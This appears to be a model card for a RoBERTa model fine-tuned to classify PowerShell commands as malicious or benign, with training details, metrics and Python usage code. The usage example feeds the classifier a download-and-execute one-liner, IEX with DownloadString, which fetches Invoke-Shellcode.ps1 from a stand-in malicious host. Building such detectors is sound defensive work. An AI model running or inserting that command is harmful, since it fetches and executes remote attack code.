# neon-roberta-finetuned-powershell-detector ## โšก PowerShell Command Classifier (RoBERTa-base fine-tuned) This model is a fine-tuned [RoBERTa-base](https://huggingface.co/roberta-base) model for binary classification of PowerShell scripts. It predicts whether a given PowerShell command or script is **malicious (1)** or **benign (0)**. --- ## ๐Ÿ“ฆ Model Details - **Base model**: `roberta-base` - **Task**: Sequence Classification - **Classes**: - `0` โ€” Benign - `1` โ€” Malicious - **Dataset**: Custom-labeled dataset of real-world PowerShell commands - **Input format**: Raw PowerShell command text (single string) - **Tokenizer**: `roberta-base` tokenizer --- ## ๐Ÿ Training Details - **Epochs**: 3 - **Batch size**: Depends on context (e.g. 16 or 32 with gradient accumulation) - **Optimizer**: AdamW - **Learning rate**: 2e-5 with linear decay - **Loss**: Cross-entropy - **Hardware**: Fine-tuned on AWS `g5.4xlarge` with A10G GPU --- ## ๐Ÿ“ˆ Evaluation Results | Metric | Value | |----------------|----------| | Accuracy | ~98.7% | | Eval Loss | ~0.089 | | Final Train Loss | ~0.058 | | Runtime per Epoch | ~2 mins | --- ## ๐Ÿš€ How to Use ```python from transformers import AutoTokenizer, AutoModelForSequenceClassification import torch tokenizer = AutoTokenizer.from_pretrained("YOUR_USERNAME/finetuned-roberta-powershell-detector") model = AutoModelForSequenceClassification.from_pretrained("YOUR_USERNAME/finetuned-roberta-powershell-detector") def classify_powershell(script): inputs = tokenizer(script, return_tensors="pt", truncation=True, padding=True) with torch.no_grad(): outputs = model(**inputs) logits = outputs.logits prediction = torch.argmax(logits, dim=1).item() return "malicious" if prediction == 1 else "benign" example = "IEX (New-Object Net.WebClient).DownloadString('http://malicious.site/Invoke-Shellcode.ps1');" print(classify_powershell(example)) ``` --- ## ๐Ÿ” Intended Use This model is meant for **PowerShell threat detection** and research use in **cybersecurity automation pipelines**, such as: - Security Operations Center (SOC) triage tools - Malware analysis and sandboxing systems - SIEM/EDR integrations - AI-assisted incident response --- ## โš ๏ธ Limitations & Considerations - This model is trained on a specific dataset of encoded PowerShell scripts and may not generalize well to **obfuscated** or **novel attack patterns**. - Should not be used as the sole decision-maker for security classificationโ€”best used as a signal in a larger detection system. - May produce false positives for rare or edge-case benign scripts. --- ## ๐Ÿ“„ License MIT or Apache 2.0 (specify your license) --- ## ๐Ÿ™ Acknowledgements - Base model from [RoBERTa (Liu et al., 2019)](https://arxiv.org/abs/1907.11692) - Transformers by [Hugging Face](https://huggingface.co/transformers/)